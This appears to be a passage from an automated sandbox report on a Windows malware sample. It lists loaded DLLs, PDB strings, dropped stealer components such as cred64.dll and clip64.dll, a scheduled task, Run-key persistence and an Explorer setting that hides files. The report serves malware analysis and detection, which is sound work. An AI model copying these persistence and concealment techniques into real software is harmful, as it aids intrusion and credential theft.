                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office
                          Source: mggoBrtk9t.exeStatic PE information: Image base 0x140000000 > 0x60000000
                          Source: mggoBrtk9t.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525826134.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526540586.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514700090.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513867334.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: ucrtbase.pdb source: 56C7.tmp.ctx.exe, 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmp
                          Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1521485641.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514287151.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513327898.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524266099.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525412258.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526711457.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 56C7.tmp.ctx.exe, 00000010.00000002.1552781026.00007FFEF6561000.00000002.00000001.01000000.0000000D.sdmp
                          Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1516604670.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524630486.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1523917344.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1512658060.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525233426.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514393425.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcruntime140.amd64.pdbGCTL source: 56C7.tmp.ctx.exe, 0000000B.00000003.1512340032.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1552964109.00007FFEF6C9E000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1522257553.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514055040.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514520918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525045977.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1522655585.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: ucrtbase.pdbUGP source: 56C7.tmp.ctx.exe, 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmp
                          Source: Binary string: vcruntime140.amd64.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1512340032.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1552964109.00007FFEF6C9E000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1527207140.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1515940882.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524081163.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1521949636.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514165152.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524822647.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 56C7.tmp.ctx.exe, 00000010.00000002.1551864143.00007FFEDDACD000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526087682.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1520566936.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1522426351.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1521751847.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1527462730.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1523349251.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524425384.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1523632509.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514869646.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526341580.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1517867226.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1517222458.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B344028000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525608468.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526969179.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: 6148.tmp.ssg.exe.5.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC41050 LoadLibraryA,GetProcAddress,0_2_00007FF7CDC41050
                          Source: mggoBrtk9t.exeStatic PE information: section name: .x64
                          Source: A629855EB2A22925382193.exe.0.drStatic PE information: section name: .x64
                          Source: 6B1D.tmp.update.exe.5.drStatic PE information: section name: .x64
                          Source: libcrypto-1_1.dll.11.drStatic PE information: section name: .00cfg
                          Source: cred64[1].dll.23.drStatic PE information: section name: _RDATA
                          Source: cred64.dll.23.drStatic PE information: section name: _RDATA
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC4DEC1 push rcx; iretd 0_2_00007FF7CDC4DEC2
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC4DCC2 push rbp; iretd 0_2_00007FF7CDC4DCC3
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC4DE70 push 00000041h; ret 0_2_00007FF7CDC4DE74
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC4DE59 push rbp; iretd 0_2_00007FF7CDC4DE5A
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEADEC1 push rcx; iretd 2_2_00007FF68DEADEC2
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEADCC2 push rbp; iretd 2_2_00007FF68DEADCC3
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEADE70 push 00000041h; ret 2_2_00007FF68DEADE74
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEADE59 push rbp; iretd 2_2_00007FF68DEADE5A
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF67352DE59 push rbp; iretd 6_2_00007FF67352DE5A
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF67352DE70 push 00000041h; ret 6_2_00007FF67352DE74
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF67352DEC1 push rcx; iretd 6_2_00007FF67352DEC2
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF67352DCC2 push rbp; iretd 6_2_00007FF67352DCC3
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB5DCC2 push rbp; iretd 8_2_00007FF6FDB5DCC3
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB5DEC1 push rcx; iretd 8_2_00007FF6FDB5DEC2
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB5DE59 push rbp; iretd 8_2_00007FF6FDB5DE5A
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB5DE70 push 00000041h; ret 8_2_00007FF6FDB5DE74
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B52DE59 push rbp; iretd 9_2_00007FF63B52DE5A
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B52DE70 push 00000041h; ret 9_2_00007FF63B52DE74
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B52DEC1 push rcx; iretd 9_2_00007FF63B52DEC2
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B52DCC2 push rbp; iretd 9_2_00007FF63B52DCC3
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1EFAED push rdi; ret 16_2_00007FFEEE1EFAF4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1EA5B5 push rdi; ret 16_2_00007FFEEE1EA5BB
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1EA096 push rdi; ret 16_2_00007FFEEE1EA0A2
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1F0200 push rdi; ret 16_2_00007FFEEE1F0206
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6C9CB1B push rbp; retf 16_2_00007FFEF6C9CB28
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeCode function: 17_2_050AD442 push eax; ret 17_2_050AD451
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004C3573 pushad ; ret 18_2_004C358D
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004C750F pushad ; iretd 18_2_004C7510
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004DA6B4 push ecx; ret 18_2_004DA6C7
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004CD989 pushfd ; retf 0000h18_2_004CD98A
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0032A6B4 push ecx; ret 19_2_0032A6C7
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\_hashlib.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\python38.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\unicodedata.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\ucrtbase.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\cred64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\_socket.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\_ctypes.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\_lzma.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\libffi-7.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeFile created: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeFile created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6B1D.tmp.update.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\VCRUNTIME140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\select.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15962\_bz2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeFile created: C:\Windows\Tasks\Gxtuum.job
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
